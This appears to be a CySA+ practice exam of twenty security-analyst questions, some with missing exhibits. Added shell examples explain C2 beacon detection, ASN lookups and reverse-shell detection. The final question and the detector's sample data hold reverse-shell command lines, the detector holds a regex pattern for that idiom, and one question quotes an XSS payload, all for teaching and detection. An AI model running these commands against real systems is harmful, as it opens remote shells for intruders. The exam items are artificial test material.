CYSA+ 003

Title of test:
CYSA+ 003

Description:
Practice Exam 1

Creation Date: 2025/03/12

Category: Others

Number of questions: 20

Content:

When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has been running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior?. A. Changes to system environment variables. B. SMB network traffic related to the system process. C. Recent browser history of the primary user. D. Activities taken by PID 1024.

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?. A. Upload the binary to an air-gapped sandbox for analysis. B. Send the binaries to the antivirus vendor. C. Execute the binaries on an environment with internet connectivity. D. Query the file hashes using VirusTotal.

A technician is analyzing output from a popular network mapping tool for a PCI audit: Which of the following best describes the output?. A. The host is not up or responding. B. The host is running excessive cipher suites. C. The host is allowing insecure cipher suites. D. The Secure Shell port on this host is closed.

A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?. A. SIEM. B. XDR. C. SOAR. D. EDR.

While reviewing web server logs, a security analyst found the following line: <IMG SRC='vbscript:msgbox("test")'> Which of the following malicious activities was attempted?. A. Command injection. B. XML injection. C. Server-side request forgery. D. Cross-site scripting.

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?. A. Business continuity plan. B. Vulnerability management plan. C. Disaster recovery plan. D. Asset management plan.

An incident response team member is triaging a Linux server. The output is shown below: Which of the following is the adversary most likely trying to do?. A. Create a backdoor root account named zsh. B. Execute commands through an unsecured service account. C. Send a beacon to a command-and-control server. D. Perform a denial-of-service attack on the web server.

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two.) A. Drop the tables on the database server to prevent data exfiltration. B. Deploy EDR on the web server and the database server to reduce the adversary's capabilities. C. Stop the httpd service on the web server so that the adversary cannot use web exploits. D. Use microsegmentation to restrict connectivity to/from the web and database servers. E. Comment out the HTTP account in the /etc/passwd file of the web server. F. Move the database from the database server to the web server.

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment: Which of the following should be completed first to remediate the findings?. A. Ask the web development team to update the page contents. B. Add the IP address allow listing for control panel access. C. Purchase an appropriate certificate from a trusted root CA. D. Perform proper sanitization on all fields.

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?. A. function w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info" }. B. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }. C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo "$1 | $info" }. D. function z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }.

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?. A. function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a" }. B. function x() { b=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }. C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short }. D. function z() { c=$(geoiplookup $1) && echo "$1 | $c" }.

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?. A. C2 beaconing activity. B. Data exfiltration. C. Anomalous activity on unexpected ports. D. Network host IP address scanning. E. A rogue network device.
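The giveaway in this scenario is regularity rather than volume: the same server reaching the same public address over HTTPS at a steady interval, day and night, is how a C2 implant checks in, whereas exfiltration tends to be bursty and large. As an added example that is not from the exam page, the POSIX shell function below (awk does the arithmetic) takes flow records as "epoch src dst dport" lines, measures the interval between successive connections to each destination, and reports destinations whose interval is nearly constant. The flow lines and the addresses 10.20.0.7, 203.0.113.10, 198.51.100.5 and 192.0.2.9 are constructed for the example.

```shell
#!/bin/sh
# Added example, not from the exam page. Flags beacon-like flows:
# many connections to one destination at a near-constant interval.
# Input on stdin: "epoch src dst dport", one flow per line.

detect_beacons() {
    # $1 = connections needed before a verdict (default 5)
    # $2 = max coefficient of variation, stddev/mean of the interval (default 0.10)
    sort -k1,1n | awk -v min_count="${1:-5}" -v max_cv="${2:-0.10}" '
    {
        key = $2 " -> " $3 ":" $4
        if (key in last) {                 # interval since the previous flow
            d = $1 - last[key]
            n[key]++; sum[key] += d; sumsq[key] += d * d
        }
        last[key] = $1
    }
    END {
        for (k in n) {
            if (n[k] < min_count) continue
            mean = sum[k] / n[k]
            var  = sumsq[k] / n[k] - mean * mean
            if (var < 0) var = 0           # rounding guard
            cv = (mean > 0) ? sqrt(var) / mean : 1
            if (cv <= max_cv)
                printf "%s interval=%.0fs n=%d cv=%.3f\n", k, mean, n[k], cv
        }
    }'
}

# Constructed flows: 10.20.0.7 checks in with 203.0.113.10:443 every
# 600 s (a beacon), talks to 198.51.100.5:443 at irregular times
# (normal traffic), and reaches 192.0.2.9:443 only three times.
SAMPLE_FLOWS='1710000000 10.20.0.7 203.0.113.10 443
1710000600 10.20.0.7 203.0.113.10 443
1710000050 10.20.0.7 198.51.100.5 443
1710001200 10.20.0.7 203.0.113.10 443
1710001800 10.20.0.7 203.0.113.10 443
1710001900 10.20.0.7 198.51.100.5 443
1710002400 10.20.0.7 203.0.113.10 443
1710002410 10.20.0.7 198.51.100.5 443
1710003000 10.20.0.7 203.0.113.10 443
1710003600 10.20.0.7 203.0.113.10 443
1710004200 10.20.0.7 203.0.113.10 443
1710004100 10.20.0.7 198.51.100.5 443
1710006500 10.20.0.7 198.51.100.5 443
1710006530 10.20.0.7 198.51.100.5 443
1710000100 10.20.0.7 192.0.2.9 443
1710000700 10.20.0.7 192.0.2.9 443
1710001300 10.20.0.7 192.0.2.9 443'

# Run the detector over the constructed flows with default thresholds.
beacons() {
    printf '%s\n' "$SAMPLE_FLOWS" | detect_beacons
}

beacons   # prints: 10.20.0.7 -> 203.0.113.10:443 interval=600s n=7 cv=0.000
```

Real implants add jitter to the sleep interval, so in practice the cv threshold is set higher (10 to 30 percent) and combined with a minimum observation window; the point of the check is that a destination contacted at a steady cadence across both working and after-hours periods, as in the question, stands out from interactive traffic.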

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?. A. Reduce the administrator and privileged access accounts. B. Employ a network-based IDS. C. Conduct thorough incident response. D. Enable SSO to enterprise applications.

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?. A. MITRE ATT&CK. B. Cyber Kill Chain. C. OWASP. D. STIX/TAXII.

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?. A. Single pane of glass. B. Single sign-on. C. Data enrichment. D. Deduplication.

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?. A. Instruct the firewall engineer that a rule needs to be added to block this external server. B. Escalate the event to an incident and notify the SOC manager of the activity. C. Notify the incident response team that there is a DDoS attack occurring. D. Identify the IP/hostname for the requests and look at the related activity.

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?. A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }. B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }. C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info" }. D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }.
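The three shell-function questions above turn on what each tool resolves: geoiplookup maps an address to a country, a TXT query under origin.asn.cymru.com maps it to the announcing ASN (so addresses from different prefixes of the same company share one ASN), and traceroute shows the path packets actually take. As an added example that is not from the exam page, the POSIX shell below shows the mechanics behind the ASN option: it builds the reversed-octet query name, parses the TXT answer, and compares ASNs. The sample answers are constructed in the shape the service returns (the ASN and prefix values are illustrative, not verified data), and the live asn_lookup function needs dig and network access, so it is defined but not called.

```shell
#!/bin/sh
# Added example, not from the exam page. Shows the mechanics behind the
# "dig ... origin.asn.cymru.com TXT" option: reversed octets, the TXT
# answer format, and grouping addresses by announcing ASN.

# Build the reversed-octet query name for an IPv4 address
# (104.16.1.1 -> 1.1.16.104.origin.asn.cymru.com). Prints nothing
# for input that is not four dotted octets.
cymru_name() {
    printf '%s\n' "$1" |
        awk -F. 'NF == 4 { print $4 "." $3 "." $2 "." $1 ".origin.asn.cymru.com" }'
}

# Parse one Cymru TXT answer, "ASN | prefix | CC | registry | date",
# and print "ASN CC prefix" so the fields are easy to group on.
parse_cymru() {
    printf '%s\n' "$1" | tr -d '"' |
        awk -F'|' '{
            for (i = 1; i <= 3; i++) gsub(/^ +| +$/, "", $i)
            print $1, $3, $2
        }'
}

# Two answers refer to the same announcing network if their ASN fields match.
same_asn() {
    a=$(parse_cymru "$1" | awk '{ print $1 }')
    b=$(parse_cymru "$2" | awk '{ print $1 }')
    [ -n "$a" ] && [ "$a" = "$b" ]
}

# Live lookup; needs dig and network access, so it is not run below.
asn_lookup() {
    dig +short TXT "$(cymru_name "$1")"
}

# Constructed sample answers in the shape the service returns
# (ASN and prefix values are illustrative, not verified data).
SAMPLE_A='"13335 | 104.16.0.0/12 | US | arin | 2014-03-28"'
SAMPLE_B='"13335 | 172.64.0.0/13 | US | arin | 2015-02-25"'
SAMPLE_C='"15169 | 8.8.8.0/24 | US | arin | 2023-12-28"'

cymru_name 104.16.1.1            # prints 1.1.16.104.origin.asn.cymru.com
parse_cymru "$SAMPLE_A"          # prints 13335 US 104.16.0.0/12
same_asn "$SAMPLE_A" "$SAMPLE_B" && echo "A and B: same ASN"
same_asn "$SAMPLE_A" "$SAMPLE_C" || echo "A and C: different ASN"
```

The exam's option C derives the reversed octets from the PTR line of "dig -x" instead of with awk; either way the query name is the address reversed under origin.asn.cymru.com. Note that the country code in the answer is the registry's allocation country, not where the host is located, which is why a GeoIP database is the tool for "same country" and the ASN is the tool for "same company".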

An analyst is reviewing a vulnerability report for a server environment with the following entries: Which of the following systems should be prioritized for patching first?. A. 10.101.27.98. B. 54.73.225.17. C. 54.74.110.26. D. 54.74.110.228.

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?. A. Scope. B. Weaponization. C. CVSS. D. Asset Value.

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>&1 Which of the following is being attempted?. A. RCE. B. Reverse Shell. C. XSS. D. SQL Injection.
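The command in this question opens an interactive shell whose stdout and stderr are redirected into bash's /dev/udp pseudo-device (a UDP socket to 10.1.1.1:4821) and whose stdin is tied to the same socket with 0>&1, which is the textbook reverse shell. As an added example that is not from the exam page, the POSIX shell below is a grep-based triage check for that idiom over command-line telemetry; the log lines it scans are constructed for the example, and the user names and addresses in them are made up.

```shell
#!/bin/sh
# Added example, not from the exam page. A grep-based triage check for the
# bash "/dev/tcp" and "/dev/udp" reverse-shell idiom in the question.
# The command lines below are constructed for the example.

# Return 0 if a command line looks like a device-file reverse shell: an
# interactive shell (-i) whose output is redirected into
# /dev/tcp/<ip>/<port> or /dev/udp/<ip>/<port>.
is_reverse_shell() {
    printf '%s\n' "$1" |
        grep -Eq '(^|[^A-Za-z])(ba)?sh +-i.*>&? */dev/(tcp|udp)/[0-9]{1,3}(\.[0-9]{1,3}){3}/[0-9]{1,5}'
}

# Print "proto ip port" for the first device-file target on the line,
# ready for a firewall rule or a pivot into flow data.
reverse_shell_target() {
    printf '%s\n' "$1" |
        grep -Eo '/dev/(tcp|udp)/[0-9.]+/[0-9]+' | head -n 1 |
        awk -F/ '{ print $3, $4, $5 }'
}

# Scan "user command..." lines from stdin; print target and line for hits.
scan_commands() {
    while IFS= read -r line; do
        if is_reverse_shell "$line"; then
            printf '%s\t%s\n' "$(reverse_shell_target "$line")" "$line"
        fi
    done
}

# Constructed command-line telemetry: two reverse shells, two benign lines.
SAMPLE_CMDS='www-data sh -i >& /dev/udp/10.1.1.1/4821 0>&1
root tar -czf /tmp/backup.tgz /var/www
www-data bash -c "bash -i >& /dev/tcp/10.1.1.1/4444 0>&1"
deploy sh -c "echo hi > /dev/null"'

# Number of matching lines in the constructed sample.
hit_count() {
    printf '%s\n' "$SAMPLE_CMDS" | scan_commands | awk 'END { print NR }'
}

printf '%s\n' "$SAMPLE_CMDS" | scan_commands
hit_count   # prints 2
```

Two caveats a responder should keep in mind: /dev/tcp and /dev/udp are a bash feature, so the "sh -i" form only works where sh is bash (on Debian-derived systems sh is dash and the redirection simply creates a file path error), and a signature like this catches the unobfuscated idiom only; encoded or split payloads need the process tree and the outbound connection itself, not the command string.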
